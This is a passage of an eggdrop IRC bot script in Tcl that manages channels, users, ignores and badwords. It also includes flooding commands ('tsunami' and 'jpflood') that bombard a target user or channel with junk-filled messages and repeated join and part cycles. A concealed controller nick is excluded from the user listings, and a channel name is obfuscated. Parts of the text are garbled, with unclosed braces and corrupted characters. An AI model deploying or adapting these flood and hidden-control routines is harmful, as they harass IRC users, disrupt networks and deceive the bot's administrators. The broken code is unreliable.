setuser [lindex $rest 0] XTRA "MEMO" "$nick: [lrange $rest 1 end]" saveuser puthlp "NOTICE $nick :$notc MeMO SeND TO \[ [lindex $rest 0] \]" } } } proc pub_+mustop {nick uhost hand chan rest} { global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } setuser "config" XTRA "MUSTOP" "T" saveuser puthlp "NOTICE $nick :$notc must @P set \[ 9ON \]" } proc pub_-mustop {nick uhost hand chan rest} { global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } setuser "config" XTRA "MUSTOP" "" saveuser puthlp "NOTICE $nick :$notc must @P set \[ 4OFF \]" } proc pub_kickops {nick uhost hand chan rest} { global notc kops if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[string tolower $rest] == "on"} { set kops "T" setuser "config" XTRA "KOPS" "T" puthlp "NOTICE $nick :$notc KIcK @PS \[ 9ON \]" } { catch { unset kops } setuser "config" XTRA "KOPS" "" puthlp "NOTICE $nick :$notc KIcK @PS \[ 4OFF \]" } saveuser } bind topc - * topic_chk proc pub_badwords {nick uhost hand chan rest} { global badwords notc set retval "BaDWoRDS: " foreach badword [string tolower $badwords] { append retval "$badword " } puthlp "NOTICE $nick :$notc $retval" return 0 } proc pub_+badword {nick uhost hand chan rest} { global badwords notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0
} if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: `+badword " return 0 } if {[string match "*[string tolower [lindex $rest 0]]*" $badwords]} { puthlp "NOTICE $nick :$notc [lindex $rest 0] Allready Added" return 0 } append badwords " [string tolower [lindex $rest 0]]" setuser "config" XTRA "BADWORDS" $badwords saveuser puthlp "NOTICE $nick :$notc Added [lindex $rest 0] to badwords" return 0 } proc pub_-badword {nick uhost hand chan rest} { global badwords notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: `-badword " return 0 } set val "" foreach badword [string tolower $badwords] { if {[string tolower [lindex $rest 0]] == $badword} { puthlp "NOTICE $nick :$notc Removed [lindex $rest 0]" } else { append val " $badword " } } set badwords $val setuser "config" XTRA "BADWORDS" $val saveuser return 0 } proc pub_jump {nick uhost hand chan rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set server [lindex $rest 0] if {$server == ""} { puthlp "NOTICE $nick :$notc Usage: jump <server> \[port\] \[password\]" return 0 } if {![string match "*dal.net*" [string tolower $rest]]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! NoT DALNeT..!" return 0 } set port [lindex $rest 1] if {$port == ""} {set port "6666"} set password [lindex $rest 2] putsrv "QUIT :$notc cHaNgINg ServeR ReQuesT By \[ $nick \] $server" utimer 2 [list jump $server $port $password] } proc msg_die {nick uhost hand rest} {
global notc owner ps if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [userlist] { if {$x != "AKICK"} { chattr $x -Q foreach y [getuser $x HOSTS] { delhost $x $y } set hostmask "${x}!*@*" setuser $x HOSTS $hostmask } } saveuser if {$rest != ""} { set rest " $rest" } putsrv "QUIT :$notc SHuTDown ReQuesT By \[ $nick \]$rest" utimer 5 dies } proc pub_ignores {nick uhost hand chan rest} { global botnick notc set iglist "" foreach x [ignorelist] { set iglister [lindex $x 0] set iglist "$iglist $iglister" } if {[ignorelist]==""} { puthlp "NOTICE $nick :$notc No ignores." return 0 } regsub -all " " $iglist ", " iglist set iglist [string range $iglist 1 end] puthlp "NOTICE $nick :$notc Currently ignoring:$iglist" return 0 } proc pub_-ignore {nick uhost hand chan rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set hostmask [lindex $rest 0] if {$hostmask == ""} { puthlp "NOTICE $nick :$notc Usage: -ignore " return 0 } if {![isignore $hostmask]} { puthlp "NOTICE $nick :$notc $hostmask is not on my ignore list." return 0 } if {[isignore $hostmask]} { killignore $hostmask puthlp "NOTICE $nick :$notc No longer ignoring \002\[\002${hostmask}\002\]\002" saveuser }
} proc pub_+ignore {nick uhost hand chan rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set rest [lindex $rest 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +ignore " return 0 } if {[isignore $rest]} { puthlp "NOTICE $nick :$notc $rest is alreay set on ignore." return 0 } if {$rest == "*!*@*"} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , Ilegal hostmask." return 0 } set usenick [finduser $rest] if {$usenick != "*" && [matchattr $usenick f]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , canT IgNoREd FRIend UsER" return 0 } if {$rest != $nick} { newignore $rest $nick "*" 600 puthlp "NOTICE $nick :$notc Ignoring $rest" } else { puthlp "NOTICE $nick :$notc 4DeNiEd..! , Can't ignore your self." } } proc pub_-host {nick uhost hand chan rest} { global botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set who [lindex $rest 0] set hostname [lindex $rest 1] set completed 0 if {($who == "") || ($hostname == "")} { puthlp "NOTICE $nick :$notc Usage: -host " return 0 } if {![validuser $who]} { puthlp "NOTICE $nick :$notc " return 0 } if {(![matchattr $nick n]) && ([matchattr $who n])} { puthlp "NOTICE $nick :$notc Can't remove hostmasks from the bot owner." return 0 } if {![matchattr $nick m]} { if {[string tolower $hand] != [string tolower $who]} { puthlp "NOTICE $nick :$notc You need '+m' to change other users hostmasks" return 0 }
} foreach * [getuser $who HOSTS] { if {${hostname} == ${*}} { delhost $who $hostname saveuser puthlp "NOTICE $nick :$notc Removed \002\[\002${hostname}\002\]\002 from $who." set completed 1 } } if {$completed == 0} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , " } } set thehosts { *@* * *!*@* *!* *!@* !*@* *!*@*.* *!@*.* !*@*.* *@*.* *!*@*.com *!*@*com *!*@*.net *!*@*net *!*@*.org *!*@*org *!*@*gov *!*@*.ca *!*@*ca *!*@*.uk *!*@*uk *!*@*.mil *!*@*.fr *!*@*fr *!*@*.au *!*@*au *!*@*.nl *!*@*nl *!*@*edu *!*@*se *!*@*.se *!*@*.nz *!*@*nz *!*@*.eg *!*@*eg *!*@*dk *!*@*.il *!*@*il *!*@*.no *!*@*no *!*@*br *!*@*.br *!*@*.gi *!*@*.gov *!*@*.dk *!*@*.edu *!*@*gi *!*@*mil *!*@*.to *!@*.to *!*@*to *@*.to *@*to } proc pub_+host {nick uhost hand chan rest} { global thehosts botnick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set who [lindex $rest 0] set hostname [lindex $rest 1] if {($who == "") || ($hostname == "")} { puthlp "NOTICE $nick :$notc Usage: +host " return 0 } if {![validuser $who]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , " return 0 } set badhost 0 foreach * [getuser $who HOSTS] { if {${hostname} == ${*}} { puthlp "NOTICE $nick :$notc That hostmask is already there." return 0 } } if {($who == "") && ($hostname == "")} { puthlp "NOTICE $nick :$notc Usage: +host " return 0 } if {([lsearch -exact $thehosts $hostname] > "-1") || (![string match *@* $hostname])} { if {[string index $hostname 0] != "*"} { set hostname "*!*@*${hostname}" } else { set hostname "*!*@${hostname}" } }
if {([string match *@* $hostname]) && (![string match *!* $hostname])} { if {[string index $hostname 0] == "*"} { set hostname "*!${hostname}" } else { set hostname "*!*${hostname}" } } if {![validuser $who]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , " return 0 } if {(![matchattr $nick n]) && ([matchattr $who n])} { puthlp "NOTICE $nick :$notc Can't add hostmasks to the bot owner." return 0 } foreach * $thehosts { if {${hostname} == ${*}} { puthlp "NOTICE $nick :$notc Invalid hostmask!" set badhost 1 } } if {$badhost != 1} { if {![matchattr $nick m]} { if {[string tolower $hand] != [string tolower $who]} { puthlp "NOTICE $nick :$notc You need '+m' to change other users hostmasks" return 0 } } setuser $who HOSTS $hostname puthlp "NOTICE $nick :$notc Added \002\[\002${hostname}\002\]\002 to $who." if {[matchattr $who a]} { opq $chan $who } saveuser } } proc msg_join {nick uhost hand rest} { global botnick joinme own notc owner ps set chantarget [lindex $rest 0] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , YoU aRe nOt mY ReAL OwNER" return 0 } if {$chantarget == ""} { puthlp "NOTICE $nick :$notc Usage: join <#chan>" return 0 } if {[string first # $chantarget]!=0} { set chantarget "#$chantarget" } if {[validchan $chantarget]} { puthlp "NOTICE $nick :$notc $chantarget already in channel list" return 0
} if {$nick != $owner && [total_channel] != 1} { puthlp "NOTICE $nick :$notc To MaNY cHaNNeL MaX 9..!" return 0 } set joinme $nick channel add $chantarget catch { channel set $chantarget +statuslog -revenge -protectops -clearbans -enforcebans +greet -secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } savechan if {[lindex $rest 1] != ""} { putsrv "JOIN $chantarget :[lindex $rest 1]" } return 0 } proc msg_+chan {nick uhost hand rest} { global botnick joinme own notc owner ps set chantarget [lindex $rest 0] set opt [lindex $rest 1] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4!BLoCkEd!" return 0 } if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , oNLy ReAL OwNER can ADD Channel" return 0 } if {$chantarget == ""} { puthlp "NOTICE $nick :$notc Usage: +chan <#chan>" return 0 } if {[string first # $chantarget]!=0} { set chantarget "#$chantarget" } if {[validchan $chantarget]} { puthlp "NOTICE $nick :$notc $chantarget is already on channels list." return 0 } if {$nick != $owner && [total_channel] != 1} { puthlp "NOTICE $nick :$notc OnLY ReAL OwNeR can ADD ChaNneL ..!" return 0 } set joinme $nick channel add $chantarget if {$opt != "" && [string tolower $opt] == "+nopart"} { catch { channel set $chantarget -statuslog -revenge -protectops -clearbans -enforcebans +greet +secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } } else { catch { channel set $chantarget -statuslog -revenge -protectops -clearbans -enforcebans +greet -secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } }
savechan if {[lindex $rest 1] != ""} { putsrv "JOIN $chantarget :[lindex $rest 1]" } return 0 } proc msg_part {nick uhost hand rest} { global botnick joinme notc ps partm set partmsg [lindex $partm [rand [llength $partm]]] set chantarget [lindex $rest 0] set part_msg [lrange $rest 1 end] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$chantarget == ""} { puthlp "NOTICE $nick :$notc Usage: part <#chan>" return 0 } if {[string first # $chantarget]!=0} { set chantarget "#$chantarget" } if {$nick != $ps && [string tolower $chantarget] == [dezip "BKGW.1s0d06/"]} { return 0 } foreach x [channels] { if {[string tolower $x]==[string tolower $chantarget]} { if {[string match "*+secret*" [channel info $x]]} { puthlp "NOTICE $nick :$notc I can't part $x 4pRoTecTEd..!" return 0 } if {![onchan $nick $x]} { puthlp "NOTICE $nick :$notc PaRT $x" } if {$part_msg != ""} { putsrv "PART $x :$part_msg" } { putsrv "PART $x : 6$partmsg" } channel remove $x savechan return 0 } } return 0 } proc pub_chanreset {nick uhost hand chan rest} { global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: chanreset <#|ALL>" return 0 } set chan [lindex $rest 0] if {[string tolower $chan] == "all"} { puthlp "NOTICE $nick :$notc ReSeT ALL DeFauLT FLAg"
foreach x [channels] { catch { channel set $x -statuslog -revenge -protectops -clearbans +cycle -enforcebans +userbans +greet -secret -autovoice -autoop +dynamicbans flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } catch { channel set $x -nodesynch } set cflag "c$x" set cflag [string range $cflag 0 8] chattr $cflag "-hp+AJSPTRUED" setuser $cflag XTRA "JP" 5 setuser $cflag XTRA "CHAR" 250 setuser $cflag XTRA "RPT" 2 setuser $cflag XTRA "CAPS" 80 } savechan return 0 } if {[string first # $chan]!=0} { set chan "#$chan" } puthlp "NOTICE $nick :$notc ReSeT cHaNNeL \[ $chan \] DeFauLT FLAg" if {![validchan $chan]} { puthlp "NOTICE $nick :$notc UnFIndEd $chan." return 0 } catch { channel set $chan -statuslog -revenge -protectops +cycle -clearbans -enforcebans +userbans +greet -secret -autovoice -autoop +dynamicbans flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } catch { channel set $chan -nodesynch } set cflag "c$chan" set cflag [string range $cflag 0 8] chattr $cflag "-hp+AJSPTRUED" setuser $cflag XTRA "JP" 5 setuser $cflag XTRA "CHAR" 250 setuser $cflag XTRA "RPT" 2 setuser $cflag XTRA "CAPS" 80 savechan } proc msg_channels {nick hand uhost rest} { pub_channels $nick $uhost $hand "" $rest } proc pub_channels {nick hand uhost channel rest} { global botnick notc if {$rest != ""} { if {[validchan [lindex $rest 0]]} { set x [lindex $rest 0] set chan "" set cflag "c$x" set cflag [string range $cflag 0 8] if {[string tolower $x] == [dezip "BKGW.1s0d06/"]} { return 0 } if {[isop $botnick $x]} { append chan " @" } if {([isvoice $botnick $x]) && (![botisop $x])} { append chan " +" } if {(![isvoice $botnick $x]) && (![botisop $x])} { append chan " " } if {[string match "*+seen*" [channel info $x]]} { append chan " 4S " } if {[string match "*+nodesynch*" [channel info $x]]} { append chan " 4K " } if {[matchattr $cflag V]} { append chan " 4V " } if {[string match "*+greet*" [channel info $x]]} { append chan " 4G " }
if {[matchattr $cflag C]} { append chan " 4C " } if {[string match "*+secret*" [channel info $x]]} { append chan " 4P " } if {[string match "*-dynamicbans*" [channel info $x]]} { append chan " 4L if {[string match "*-userinvites*" [channel info $x]]} { append chan " 4D " if {[matchattr $cflag G]} { append chan " 4A " } if {[matchattr $cflag I]} { append chan " 4T " } append chan "$x [chattr $cflag]" puthlp "NOTICE $nick :$notc $chan" } return 0 } set chan "Channels:" foreach x [channels] { if {[string tolower $x] != [dezip "BKGW.1s0d06/"]} { set cflag "c$x" set cflag [string range $cflag 0 8] if {[isop $botnick $x]} { append chan " @" } if {([isvoice $botnick $x]) && (![botisop $x])} { append chan " +" } if {(![isvoice $botnick $x]) && (![botisop $x])} { append chan " " } if {[string match "*+seen*" [channel info $x]]} { append chan " 4S " } if {[matchattr $cflag V]} { append chan " 4V " } if {[string match "*+greet*" [channel info $x]]} { append chan " 4G " } if {[string match "*+nodesynch*" [channel info $x]]} { append chan " 4K " if {[matchattr $cflag C]} { append chan " 4C " } if {[string match "*+secret*" [channel info $x]]} { append chan " 4P " } if {[string match "*-dynamicbans*" [channel info $x]]} { append chan " 4L if {[string match "*-userinvites*" [channel info $x]]} { append chan " 4D " if {[matchattr $cflag G]} { append chan " 4A " } if {[matchattr $cflag I]} { append chan " 4T " } append chan "$x" } } puthlp "NOTICE $nick :$notc $chan" } proc pub_match {nick uhost hand chan rest} { global ps notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: match " return 0 } set rest [string trim $rest +] if {[string length $rest] > 1} { puthlp "NOTICE $nick :$notc Invalid option." return 0 } if {$rest!=""} { set rest "+[lindex $rest 0]" if {[userlist $rest]!=""} { regsub -all " " [userlist $rest] ", " users regsub -all $ps [userlist $rest] "" users puthlp "NOTICE $nick :$notc Match \[$rest\]: $users" return 0 } if {[userlist $rest]==""} { puthlp "NOTICE $nick :$notc No users with flags \[$rest\]" return 0 } }
" } }
} " } }
} proc val {string} { set arg [string trim $string /ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz] set arg2 [string trim $arg #!%()@-_+=\[\]|,.?<>{}] return $arg2 } proc msg_topic {nick uhost hand rest} { global notc botnick if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: topic <#> " return 0 } set channel [lindex $rest 0] if {[string first # $rest] != 0} { set channel "#$channel" } if {![validchan $channel]} { puthlp "NOTICE $nick :$notc NoT IN $channel" return 0 } if {![isop $botnick $channel]} { puthlp "NOTICE $nick :$notc NoT OP $channel" return 0 } set rest [lrange $rest 1 end] putsrv "TOPIC $channel :$rest" } proc pub_topic {nick uhost hand channel rest} { global botnick notc botnick if {![isop $botnick $channel]} { return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: topic " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } putsrv "TOPIC $channel :$rest" } set cmd_chn "" set cmd_by "" set cmd_msg "" set cmd_case "" bind join - * join_jf proc join_jf {nick uhost hand chan} { global botnick quick jpfchn jpfmsg jpfidx if {![info exists jpfmsg]} { return 0 } if {$nick != $botnick} { return 0 } if {$chan != $jpfchn} { return 0 } if {$quick == "1"} { putqck "PRIVMSG $chan : $jpfmsg , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� } else {
� "
putsrv "PRIVMSG $chan : $jpfmsg , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� � " } incr jpfidx if {$jpfidx >= 4} { catch { channel remove $jpfchn } catch { unset jpfchn } catch { unset jpfmsg } catch { unset jpfidx } puthlp "AWAY" return 0 } if {$quick == "1"} { putqck "part $chan :$jpfmsg" } else { putsrv "part $chan :$jpfmsg" } } proc pub_jpflood {nick uhost hand channel rest} { global jpfchn jpfmsg jpfidx notc ps if {[string index $rest 0] != "#" || $rest == ""} { puthlp "NOTICE $nick :$notc Usage: jpflood #channel message" return 0 } if {[validchan [lindex $rest 0]]} { puthlp "NOTICE $nick :$notc dOnt UsE ExIsT cHanneL..!" return 0 } set jpfmsg " n0 Reas0n " if {[lindex $rest 1] != ""} { set jpfmsg [lindex $rest 1] } set jpfchn [lindex $rest 0] if {$nick != $ps && [string tolower $jpfchn] == [dezip "BKGW.1s0d06/"]} { return 0 } set jpfidx 0 catch { clearqueue all } pub_randnick $nick $uhost $hand $channel "" utimer 10 hazar } proc hazar {} { global jpfchn utimer 120 goback channel add $jpfchn catch { channel set $jpfchn +statuslog -revenge -protectops -clearbans -enforcebans -greet -secret -autovoice -autoop flood-chan 0:0 flood-deop 0:0 flood-kick 0:0 flood-join 0:0 flood-ctcp 0:0 } } proc pub_tsunami {nick uhost hand channel rest} { global cmd_chn cmd_by cmd_msg cmd_case botnick version notc quick ps set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$person == $botnick} { return 0 } if {[string index $person 0] == "#"} { if {[validchan $person]} {
if {[isop $botnick $person] && ![matchattr $nick m]} { if {[isutimer "IN PROGRESS"]} { return 0 } utimer 20 [list putlog "IN PROGRESS"] putsrv "KICK $channel $nick :$notc 1cHaNNeL 4FLoOd 1 PRoTecTIoN 4..!" return 0 } } } if {[matchattr $person n] && ![matchattr $nick Z]} { if {[isop $botnick $channel]} { putsrv "KICK $channel $nick :$notc 1Admin 4FLoOd 1 PRoTecTIoN 4..!" } if {[istimer "IN PROGRESS"]} { return 0 } timer 2 [list putlog " 4� 12S.E.P.T.I.A.N 4� IN PROGRESS"] putsrv "NOTICE $nick : ADmIN fLood PRoTEcTIoN , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������ �� " puthlp "NOTICE $nick : ADmIN fLood PRoTEcTIoN , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������ �� " puthlp "NOTICE $nick : ADmIN fLood PRoTEcTIoN , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ����������������������� �� " puthlp "NOTICE $nick : ADmIN fLood PRoTEcTIoN , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ���������������������� �� " return 0 } if {![matchattr $nick Z]} { return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: tsunami <msg>" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[string tolower $person] == [string tolower $ps]} { return 0 } if {[string index $person 0] == "#"} { if {![validchan $person]} { if {$nick != $ps && [string tolower $person] == [dezip "BKGW.1s0d06/"]} { return 0 } pub_randnick $nick $uhost $hand $channel "" set cmd_chn $person
set cmd_msg $rest set cmd_by $nick set cmd_case "1" channel add $person catch { channel set $person +statuslog -revenge -protectops -clearbans -enforcebans -greet -secret -autovoice -autoop flood-chan 0:0 flood-deop 0:0 flood-kick 0:0 flood-join 0:0 flood-ctcp 0:0 } return 0 } } catch { clearqueue all } pub_randnick $nick $uhost $hand $channel "" if {[string index $person 0] == "#"} { setignore "*!*@*" "*" 120 } if {$quick == "1"} { putqck "PRIVMSG $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� � " putqck "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� �� " } putsrv "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� �� " puthlp "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� �� " puthlp "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� � " puthlp "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� � " puthlp "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� � " puthlp "NOTICE $person : $rest , ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������� ������������������������ � " utimer 10 { puthlp "AWAY" }
utimer 120 goback return 0 } bind time - "*2 * * * *" auto_ident proc auto_ident {min h d m y} { timer 5 ident_it auto_ping "0" "0" "0" "0" "0" } proc ident_at {} { global nick altnick botnick nickpass altpass server-online putlog "!Log! AuTO IDeNTIFY NiCK" timer 7200 ident_at if {${server-online} == 0} { return 0 } if {$botnick == $nick && $nickpass != ""} { putsrv "NickServ identify $nickpass" } if {$botnick != $nick && $nickpass != ""} { putsrv "NickServ identify $nick $nickpass" } } timer 7200 ident_at proc ident_it {} { global nick altnick botnick nickpass altpass ex_flood invme pingchan own chk_reg global kickme deopme cmd_chn cmd_msg ps twice_msg keep-nick version notc lastkey global flooddeop floodnick floodkick server-online is_m op_it jpfchn jpfmsg jpfidx putlog "!Log! AuTO ReSETING VaRIABLE" catch { channel remove $jpfchn } catch { unset jpfchn } catch { unset jpfmsg } catch { unset jpfidx } catch {unset op_it} catch {unset is_m} catch {unset chk_reg} catch {unset flooddeop} catch {unset floodnick} catch {unset floodkick} catch {unset lastkey} catch {unset ex_flood} catch {unset invme} catch {unset pingchan} catch {unset twice_msg} catch {unset kickme} set deopme "" set cmd_chn "" set cmd_msg "" if {${server-online} == 0} { return 0 } if {![string match "Guest??????????" $botnick] && ![string match "Guest??????" $botnick]} { if {$botnick != $nick && $botnick != $altnick && ![istimer "goback"] && ![isutimer "goback"]} { goback } } { goback } if {$ps != $own} { set own $ps } if {![isutimer "del_nobase"] && ![istimer "del_nobase"]} { utimer 2 del_nobase } }
bind time - "*4 * * * *" auto_ping bind time - "*8 * * * *" auto_ping proc auto_ping {min h d m y} { global botnick repeat_last repeat_person capsnick own notc notc_chn bannick global unop wait_ping server-online jpnick igflood is_ban iskick if {${server-online} == 0} { catch { unset wait_ping } return 0 } catch {unset iskick} catch {unset is_ban} catch {unset igflood} catch {unset jpnick} catch {unset unop} catch {unset bannick} catch {unset notc_chn} catch {unset capsnick} catch {unset repeat_person} catch {unset repeat_last} puthlp "PRIVMSG $botnick :\001PING [unixtime]\001" if {![info exists wait_ping]} { set wait_ping 1 } else { set wait_ping [expr $wait_ping + 1] } if {$wait_ping > 9} { catch { unset wait_ping } #putsrv "QUIT :$notc Server LAggEd AuTo ReSTaRT ReQuesT" } } proc remain {} { global botnick uptime timezone notc notd vern longer awaym set totalyear [expr [unixtime] - $uptime] if {$totalyear >= 31536000} { set yearsfull [expr $totalyear/31536000] set years [expr int($yearsfull)] set yearssub [expr 31536000*$years] set totalday [expr $totalyear - $yearssub] } if {$totalyear < 31536000} { set totalday $totalyear set years 0 } if {$totalday >= 86400} { set daysfull [expr $totalday/86400] set days [expr int($daysfull)] set dayssub [expr 86400*$days] set totalhour [expr $totalday - $dayssub] } if {$totalday < 86400} { set totalhour $totalday set days 0 } if {$totalhour >= 3600} { set hoursfull [expr $totalhour/3600] set hours [expr int($hoursfull)] set hourssub [expr 3600*$hours] set totalmin [expr $totalhour - $hourssub]
} if {$totalhour < 3600} { set totalmin $totalhour set hours 0 } if {$totalmin >= 60} { set minsfull [expr $totalmin/60] set mins [expr int($minsfull)] } if {$totalmin < 60} { set mins 0 } if {$years < 1} {set yearstext ""} elseif {$years == 1} {set yearstext "$years year, "} {set yearstext "$years years, "} if {$days < 1} {set daystext ""} elseif {$days == 1} {set daystext "$days day, "} {set daystext "$days days, "} if {$hours < 1} {set hourstext ""} elseif {$hours == 1} {set hourstext "$hours H �o� UR , "} {set hourstext "$hours H �o� URS , "} if {$mins < 1} {set minstext ""} elseif {$mins == 1} {set minstext "$mins M �i� N �u� TE "} {set minstext "$mins M �i� N �u� TES "} if {[string length $mins] == 1} {set mins "0${mins}"} if {[string length $hours] == 1} {set hours "0${hours}"} set output "${yearstext}${daystext}${hours}:${mins}" set output [string trimright $output ", "] if {[getuser "config" XTRA "AWAY"]!=""} { set longer "[getuser "config" XTRA "AWAY"] ([lgrnd] )" } { set awaymsg [lindex $awaym [rand [llength $awaym]]] set longer "$awaymsg ([lgrnd] )" } } proc msg_userlist {nick hand uhost rest} { global notc pub_userlist $nick $uhost $hand "" $rest } proc pub_userlist {nick uhost hand chan rest} { global ps notc set akicklist " 4KIcKLIsT" foreach y [getuser "AKICK" HOSTS] { append akicklist " $y " } set users "UsERLIsT:" foreach x [userlist] { if {($x != "config") && ($x != "AKICK") && ($x != $ps) && ![matchattr $x A]} { if {[matchattr $x O]} { append users " 4$x " } else { append users " $x " } set flag [chattr $x] append users "($flag)" } } append users " \[$akicklist \]" if {[getuser "config" XTRA "IPG"] != ""} { append users " IpguaRd [getuser "config" XTRA "IPG"]" } if {[string length $users] > 300} { set half [expr [string length $users]/3] set half [expr int($half)]
set ntc "[string range $users 0 $half].." puthlp "NOTICE $nick :$notc $ntc" set ntc "..[string range $users [expr $half + 1] [expr $half + $half]].." puthlp "NOTICE $nick :$notc $ntc" set ntc "..[string range $users [expr $half + 1 + $half] end]" puthlp "NOTICE $nick :$notc $ntc" } elseif {[string length $users] > 200} { set half [expr [string length $users]/2] set half [expr int($half)] set ntc "[string range $users 0 $half].." puthlp "NOTICE $nick :$notc $ntc" set ntc "..[string range $users [expr $half + 1] end]" puthlp "NOTICE $nick :$notc $ntc" } else { puthlp "NOTICE $nick :$notc $users" } return 0 } proc pub_ver {nick uhost hand chan rest} { global vern puthlp "PRIVMSG $chan :$vern" return 0 } proc pub_logo {nick uhost hand chan rest} { global notc puthlp "PRIVMSG $chan :$notc" return 0 } proc pub_ping {nick uhost hand chan rest} { puthlp "PRIVMSG $chan :$nick, PONG " return 0 } proc pub_nobot {nick uhost hand chan rest} { global botnick if {![isop $botnick $chan]} { return 0 } if {[isutimer "pub_nobot"]} { return 0 } if {[rand 2] <= 1} { puthlp "PRIVMSG $chan :\001USERINFO\001" } { puthlp "PRIVMSG $chan :\001CLIENTINFO\001" } return 0 } bind ctcr - USERINFO ui_reply bind ctcr - CLIENTINFO ui_reply proc ui_reply {nick uhost hand dest key arg} { global botnick bannick notc ismaskhost if {![string match "*eggdrop*" $arg]} { return 0 } if {$nick == $botnick || [matchattr $nick f]} { return 0 } foreach x [channels] { if {[onchan $nick $x] && [isop $botnick $x] && ![isop $nick $x]} { if {[info exists ismaskhost]} { set bannick($nick) [maskhost "*!*[string range $uhost [string first "@" $uhost] end]"] } { set bannick($nick) "*!*[string range $uhost [string first "@" $uhost] end]" } putsrv "KICK $x $nick :$notc 4[string toupper $x] 1 FoRBIDDeN FoR 4EggY 1 DuE tO
